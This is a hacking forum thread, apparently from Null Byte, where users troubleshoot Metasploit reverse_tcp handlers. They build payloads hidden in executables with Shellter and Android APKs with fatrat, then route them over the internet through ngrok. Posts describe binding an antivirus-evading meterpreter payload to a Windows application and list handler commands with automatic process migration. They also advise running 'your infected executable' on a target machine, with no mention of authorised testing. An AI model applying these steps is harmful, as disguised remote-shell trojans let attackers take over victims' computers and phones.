Hi, I used Shellter to create an undetectable reverse_tcp payload. It's bound with a win 32 bit application, which when run, gives us a meterpreter session. I ran it yesterday on my computer and it worked perfectly, I got a connection back. I'm trying again today but msf keeps getting stuck at "Starting the Payload Handler..." I remade the payload with the new IP address and I have made sure the LHOST and LPORT are the same for the handler. I'm pretty sure I haven't made any typos or mistakes, here are the commands I used:
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.3.92
lhost => 192.168.3.92
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
Note I have given a different IP address here for privacy reasons.
And I am running Kali Linux on VMware.
Thanks for any help
12 Responses
First of all, the payload is already set by Shellter so that isn't needed in Metasploit. Next, double check that your lhost IP is your Linux machine IP by typing in ifconfig in terminal. Then double check that it and lport match when creating your infected file with Shellter. I am guessing that is your problem. Also make sure that your target computer is on the same network. If they are on different networks your lhost needs to be your public IP address which can be found by going to http://icanhazip.com or one of many others.
Extra Info: This is something that I do that I have learned and like doing for other learning purposes. Feel free to try it out.
Instead of Metasploit I use Armitage. I run Kali off a USB so any time I start up Kali I have to run this process but it's not hard. Armitage is a GUI version of Metasploit and becomes way easier to use. Personally I would suggest to any beginner to learn with Metasploit first though to understand the basics of how it works.
Commands in terminal:
msfupdate
apt-get install armitage
msfdb init
armitage
click connect
click yes
Once Armitage opens, type what you normally would in Metasploit.
use exploit/multi/handler
set lhost 192.168.x.x
set lport 4444
I then add these commands
set exitonsession false
set autorunscript migrate -f
set prependmigrate true
(The first command allows for more than one session so you don't have to keep running the exploit and the other two commands will automatically change the process as soon as you get a meterpreter session.)
Then exploit with the command: exploit -j
Then run your infected executable on your target computer.
Hi
Everything was fine, but when I run exploit -j it keeps looping, opening sessions... I got many sessions for the host that connects, and after that I get an error in each session after I execute any command.
The error is: stdapi try command again
Can you please help?
Thanks
Hey thanks for replying, I tried again and omitted the set payload windows/meterpreter/reverse_tcp step and double checked the IP I used is for the Linux machine and is the same IP I used when making the file in Shellter. However it's still stuck at "Starting the Payload Handler..." I tried to upload a screenshot too but I don't know how to, sorry I'm new to WHT
EDIT: btw I didn't know about using public IP if they aren't on the same network, thanks for that
First my session was successfully connected but the next day it got stuck at "Starting the payload handler..."
With Armitage it's also the same
I updated my Metasploit by msfupdate
I am running Kali Linux 2016.2 full i686 on VMWare
Now it gives this error in the terminal opened with armitage that
Used the tab method: 192.168.XXX.XXX
Starting Cortana on 192.168.XXX.XXX
Creating a default reverse handler... 0.0.0.0:24238
Remote Exploit Stances
The Payload APK was installed and opened also
Screenshots here: http://prntscr.com/dawnmu
Hey, can anyone help me find why I can't get a working Metasploit session?
It gets stuck at starting the payload handler
I'm using ngrok for the port forwarding option.
Did everything that is mentioned on the site.
Please tell me your commands for your listener and your payload. That way I can see if you are doing something wrong.
I'm using fatrat with ngrok to create a payload (android apk)
Starting ngrok :
./ngrok tcp 4564
For the payload :
set lhost 0.tcp.ngrok.io
set lport xxxx (port from ngrok)
For the listener :
The procedure is working when I'm on LAN and don't have to use ngrok. But over WAN it's not starting.
Maybe the problem is because I can't establish an ngrok tunnel properly to my machine.
Also previously I was successful using ngrok with social engineering tools, but now it gives me the error (attached image). I guess because of this only the Metasploit session is not opening. Please help
Sorry, I'm unable to help. I don't know anything about ngrok. Hopefully someone else can help. I'd recommend posting your own forum topic.
Okay, Did that. Thanks Anyway.
And if you know someone who might help me with this, here is the link to my forum
null-byte.wonderhowto.com/forum/need-help-with-fatrat-over-wan-0183192/
Have a good day..
My process is stuck at "Started reverse TCP handler on 0.0.0.0" (my IP using ifconfig).
Does anyone know the answer to this question?
My process is stuck at "Started reverse TCP handler on 0.0.0.0" (my IP using ifconfig).???